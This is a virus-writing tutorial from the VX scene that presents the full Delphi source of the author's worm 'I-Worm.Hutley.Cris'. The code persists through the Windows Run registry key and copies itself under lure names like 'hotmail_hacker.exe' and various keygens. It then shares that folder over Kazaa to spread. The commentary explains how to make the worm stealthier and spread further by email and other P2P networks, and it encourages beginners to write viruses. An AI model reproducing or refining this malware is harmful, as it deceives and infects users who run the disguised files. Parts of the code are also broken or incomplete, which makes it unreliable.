Simple Worm In Delphi And Corrections
by Hutley
|                                                                            |
|                   SIMPLE WORM IN DELPHI AND CORRECTIONS                    |
|                                                                            |

  Here I will go to explain to you the code of my first worm. Totaly written in
Delphi. It was my first creation of type WORM, because since then I had made 
only one Trojan and a creator of backdoors for mirc. As I wise person very as 
well as would not have to be one worm, I was programming it in accordance with
some things that I already had made with the Legionário Trojan - my first 
creation for world vx. After programmed and distributed, I 
decided to publish the code to have the opinion of other people who were more 
the time in the branch of that I.
  At that time, I was in another group (GEDZAC), then I asked for aid to the 
other members so that they evaluated my code and they pointed me the errors.
  The result was excellent.  Those mans (MachineDramon, Falckon, Sr.Muerte,
Pana_Infierno, DemionKlaz, and others), they had had spectacular a good will
in saying me where i committed errors and which the certain method of if making
so that mine worm did not lose its effectiveness.



program porn;


{  I-Worm.Hutley.Cris
   Brasil! Rulez! }

// Please KAV Lab. this is I-Worm.Hutley.Cris
// it´s the original name! Understand?
 Windows, SysUtils, Registry;

procedure ExecutaViaRegistro(nome, path: string);
var evrg: TRegistry;
 evrg := TRegistry.Create;
 evrg.RootKey := HKEY_LOCAL_MACHINE;
 evrg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE);
 evrg.WriteString(nome, path);

procedure Kazaa;
var reg: Tregistry;
 Cris: array[0..260] of Char;
 reg := TRegistry.Create;
 reg.RootKey := HKEY_CURRENT_USER;
 reg.OpenKey('Software\Kazaa\LocalContent', True);
 reg.WriteString('DisableSharing', '0');
 reg.writestring('dir0', '012345:' + 'C:\Windows\files');
 reg.writestring('dir1', '012345:' + 'C:\Windows\files');
 reg.writestring('dir2', '012345:' + 'C:\Windows\files');
 reg.writestring('dir3', '012345:' + 'C:\Windows\files');
 reg.writestring('dir4', '012345:' + 'C:\Windows\files');
 reg.writestring('dir5', '012345:' + 'C:\Windows\files');
 CreateDirectory('C:\windows\files', nil);
 GetModuleFileNameA(0, Cris, SizeOf(Cris));
 CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True);
 CopyFile(Cris, 'C:\Windows\files\hotmail_cracker.exe', True);
 CopyFile(Cris, 'C:\Windows\files\hotmail_account_sniffer.exe', True);
 CopyFile(Cris, 'C:\Windows\files\aim_hack.exe', True);
 CopyFile(Cris, 'C:\Windows\files\msn_crack.exe', True);
 CopyFile(Cris, 'C:\Windows\files\icq_hack.exe', True);
 CopyFile(Cris, 'C:\Windows\files\WarDialer.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Delphi 6 - Serial Gen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\WinxpHack.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Delphi 7 Crack.exe', True);
 CopyFile(Cris, 'C:\Windows\files\win2k_serial_gen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\yahoo_hack.exe', True);
 CopyFile(Cris, 'C:\Windows\files\ftp_crack.exe', True);
 CopyFile(Cris, 'C:\Windows\files\XP_keygen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\PS2_emulator_bleem.exe', True);
 CopyFile(Cris, 'C:\Windows\files\win2k_pass_decryptor.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Win2k_reboot_exploit.exe', True);
 CopyFile(Cris, 'C:\Windows\files\IIS_ShellBind.exe', True);
 CopyFile(Cris, 'C:\Windows\files\WinZip_KeyGen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Counter Strike_CD_Keygen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Delphi 2005 Keygen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Delphi 9 Keygen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Half_life Cd keygen.exe', True);
 CopyFile(Cris, 'C:\Windows\files\Hotmail Hacker.exe', True);
 CopyFile(Cris, 'C:\Windows\files\ICQ_Hackingtools.exe', True);
 CopyFile(Cris, 'C:\Windows\files\invisible_IP.exe', True);

 Cris: array[0..260] of Char;
 GetModuleFileNameA(0, Cris, SizeOf(Cris));
 if not (FileExists('C:\Windows\WinExec.exe')) then
  CopyFile(Cris, 'C:\Windows\WinExec.exe', True);
  ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
 end else
  ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');


  What this worm makes is only if auto to copy for a folder created for he himself.
When it is copied using several other names, it it has access to the register of the
system and makes with that this folder is shared by the KAZAA. It also creates only 
one copy of itself in the folder of windows, and writes in the register so that all 
time is executed that windows will be initiated.

  1º - +--------------------+
       | {$APPTYPE CONSOLE} |
   This stretch, in Delphi, is called "directive compilation". Removing this directive
one, it makes with that the window console does not appear. The correct one is to remove it

  2º - +--------------------------------------------------------------+
       | CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True); |
   This line of command possesss a good idea, but its effectiveness is engaged.
     For two reasons it is engaged.  First - It copies itself for a folder that 
       will be add as shared for the KAZAA, this implies where, if the user will
       not have the KAZAA worm will not go to spread itself.  Second - as you 
       already must have noticed, the complete way of the archive already you 
       are placed, this you compromise worm if the user will have windows installed
       for example in unit E:.
     The way to kill these two problems would be, to place the auto possibility of 
       if also propagating for email and other programs of P2P.
     How much to the problem of the complete way, it is necessary to add to the code
       a function that will go to return the folder from windows, ai is enough to 
       add "files\hotmail_hacker.exe" and ready, this problem is decided.
     It sees the function that returns the folder from windows.
       function WinDir: string;
         SetLength(Result, MAX_PATH);
         Windows.GetWindowsDirectory(PChar(Result), MAX_PATH);
         Result := string(PChar(Result)) + '\';
     With this function in the code, that one same line of command would be thus:
       CopyFile(Cris, WinDir + 'files\hotmail_hacker.exe', True);

     The same thing if applies the commands:
       reg.writestring('dir0', '012345:' + 'C:\Windows\files');
     and too the:
       ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
  These are the biggest problems of this worm basic that one day I broke the head to 
develop. I wait to have helped in the initiation of plus some coders for this wonderful
world that is of the creation of virus/worms/trojans.
  With world vx diminishing each time more, I believe to be important to make beginning
basic articles for with a language of easy learning and high level as delphi is.
  This is all staff.

|         - Suggestions, critics: <>      |